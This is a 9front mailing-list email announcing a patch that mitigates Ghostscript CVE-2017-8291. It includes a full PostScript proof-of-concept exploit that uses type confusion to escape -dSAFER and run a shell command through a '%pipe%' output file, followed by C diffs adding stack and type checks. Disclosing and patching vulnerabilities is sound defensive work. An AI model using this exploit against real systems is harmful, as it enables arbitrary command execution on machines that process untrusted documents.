From mboxrd@z Thu Jan 1 00:00:00 1970 Received: from mail-pg1-f179.google.com ([209.85.215.179]) by ewsd; Fri Jun 21 06:53:33 EDT 2019 Received: by mail-pg1-f179.google.com with SMTP id 145so3198341pgh.4 for <9front@9front.org>; Fri, 21 Jun 2019 03:53:29 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=iastate.edu; s=google20150603; h=mime-version:from:date:message-id:subject:to; bh=hn6CNTbgmN7LJty1HbjGLbIUroHO9fkOI62tpXEeP4k=; b=ObvtP+vTkSXes7cUJSis/8KmhSZA8LHTsFQGSMIdIPT+9mBhHiJ0ChYgJm0/n5S7R8 lyijZbWkd4VcUsX5CRCapkqX96PnLD9Ro/gqtL3ohbP6NY0fecK7oPijcD3AP41UgQ78 ffAoaLi+oly874dTJLhLcPRpG20VXLPg2UoBk= X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20161025; h=x-gm-message-state:mime-version:from:date:message-id:subject:to; bh=hn6CNTbgmN7LJty1HbjGLbIUroHO9fkOI62tpXEeP4k=; b=ufUwxq6CQugM0WNwpBgvCGFE+b6LHrlfDbfPXDUaHmT3n064Wzi0wlzl2di4CMxn3j EJ2VHVlwqHDkixAcvQzdmOruu1ML/M1Lz3zG2/NAKzSArarLIJRZOInav0GQMFDBl90B oi7Z8MS2DQQtDP+VhJwUm6vCZdFnEhxIKYYwfPiKjqqrvwjudRadW7hX1m5x8pB/GBLw Z6oRym9sk0vc7Du1hk+b4gKv9HgpPe4yF07fVpPdRvhndoxeeJ/0EtSfdmjtkMNjI/YL CuPG8Ezb+qkFPawi7GDArDaO0qJmmpf7V56Q33QqaKVsO3Y+MlaPX2CkXEo9u9djEVQV ZDIA== X-Gm-Message-State: APjAAAVgBxrEQOe/HkGxxWQuPqUl7FT2pabKr7vLiqYmkbtaTOo0LpNF TBy4P4+eQR7cqs4kSnbk03ABrstp5eyo/++r2Et6LdkQgK8= X-Google-Smtp-Source: APXvYqzA9DwYU8AjPDmAuhcAF7vzfUvrvQEMqxvQJXEzI94pvYyRaiM7/ZsGr8PaZ0MAJADIz4ROmf0Q6/XuGAtNcKE= X-Received: by 2002:a17:90a:ac14:: with SMTP id o20mr5925913pjq.114.1561114408581; Fri, 21 Jun 2019 03:53:28 -0700 (PDT) MIME-Version: 1.0 From: Jacob Moody Date: Fri, 21 Jun 2019 05:53:16 -0500 Message-ID: Subject: [9front] ghostscript: Mitigations against CVE-2017-8291 To: 9front@9front.org Content-Type: text/plain; charset="UTF-8" List-ID: <9front.9front.org> List-Help: X-Glyph: ➈ X-Bullshit: shared session blockchain-aware rails All, Grabbed the upstream changes for the mitigation against CVE-2017-8291. The proof of concepts I found online do not seem to do anything interesting besides hang gs indefinitely or suicide. To reproduce: gs -q -dNOPAUSE -dSAFER '-sDEVICE=ppmraw' '-sOutputFile=/dev/null' <<. %!PS-Adobe-3.0 EPSF-3.0 %%BoundingBox: -0 -0 100 100 /size_from 10000 def /size_step 500 def /size_to 65000 def /enlarge 1000 def %/bigarr 65000 array def 0 size_from size_step size_to { pop 1 add } for /buffercount exch def /buffersizes buffercount array def 0 size_from size_step size_to { buffersizes exch 2 index exch put 1 add } for pop /buffers buffercount array def 0 1 buffercount 1 sub { /ind exch def buffersizes ind get /cursize exch def cursize string /curbuf exch def buffers ind curbuf put cursize 16 sub 1 cursize 1 sub { curbuf exch 255 put } for } for /buffersearchvars [0 0 0 0 0] def /sdevice [0] def enlarge array aload { .eqproc buffersearchvars 0 buffersearchvars 0 get 1 add put buffersearchvars 1 0 put buffersearchvars 2 0 put buffercount { buffers buffersearchvars 1 get get buffersizes buffersearchvars 1 get get 16 sub get 254 le { buffersearchvars 2 1 put buffersearchvars 3 buffers buffersearchvars 1 get get put buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put } if buffersearchvars 1 buffersearchvars 1 get 1 add put } repeat buffersearchvars 2 get 1 ge { exit } if %(.) print } loop .eqproc .eqproc .eqproc sdevice 0 currentdevice buffersearchvars 3 get buffersearchvars 4 get 16#7e put buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put put buffersearchvars 0 get array aload sdevice 0 get 16#3e8 0 put sdevice 0 get 16#3b0 0 put sdevice 0 get 16#3f0 0 put currentdevice null false mark /OutputFile (%pipe%echo gotce) .putdeviceparams 1 true .outputpage .rsdparams %{ } loop 0 0 .quit %asdf . Patch: diff -r 986e26228cfe sys/src/cmd/gs/src/zfrsd.c --- a/sys/src/cmd/gs/src/zfrsd.c Thu May 23 14:59:28 2019 +0200 +++ b/sys/src/cmd/gs/src/zfrsd.c Fri Jun 21 05:34:42 2019 -0500 @@ -47,13 +47,19 @@ ref *pFilter; ref *pDecodeParms; int Intent; - bool AsyncRead; + bool AsyncRead = false; ref empty_array, filter1_array, parms1_array; uint i; - int code; + int code = 0; + + if (ref_stack_count(&o_stack) < 1) + return_error(e_stackunderflow); + if (!r_has_type(op, t_dictionary) && !r_has_type(op, t_null)) + return_error(e_typecheck); make_empty_array(&empty_array, a_readonly); - if (dict_find_string(op, "Filter", &pFilter) > 0) { + if (r_has_type(op, t_dictionary) + && dict_find_string(op, "Filter", &pFilter) > 0) { if (!r_is_array(pFilter)) { if (!r_has_type(pFilter, t_name)) return_error(e_typecheck); @@ -92,10 +98,12 @@ return_error(e_typecheck); } } - if ((code = dict_int_param(op, "Intent", 0, 3, 0, &Intent)) < 0 || - (code = dict_bool_param(op, "AsyncRead", false, &AsyncRead)) < 0 - ) - return code; + if (r_has_type(op, t_dictionary)) + code = dict_int_param(op, "Intent", 0, 3, 0, &Intent); + + if (r_has_type(op, t_dictionary)) + if ((code = dict_bool_param(op, "AsyncRead", false, &AsyncRead)) < 0) + return code; push(1); op[-1] = *pFilter; if (pDecodeParms) diff -r 986e26228cfe sys/src/cmd/gs/src/zmisc3.c --- a/sys/src/cmd/gs/src/zmisc3.c Thu May 23 14:59:28 2019 +0200 +++ b/sys/src/cmd/gs/src/zmisc3.c Fri Jun 21 05:34:42 2019 -0500 @@ -55,6 +55,12 @@ ref2_t stack[MAX_DEPTH + 1]; ref2_t *top = stack; + if (ref_stack_count(&o_stack) < 2) + return_error(e_stackunderflow); + if (!r_is_array(op - 1) || !r_is_array(op)) { + return_error(e_typecheck); + } + make_array(&stack[0].proc1, 0, 1, op - 1); make_array(&stack[0].proc2, 0, 1, op); for (;;) { Thanks, moody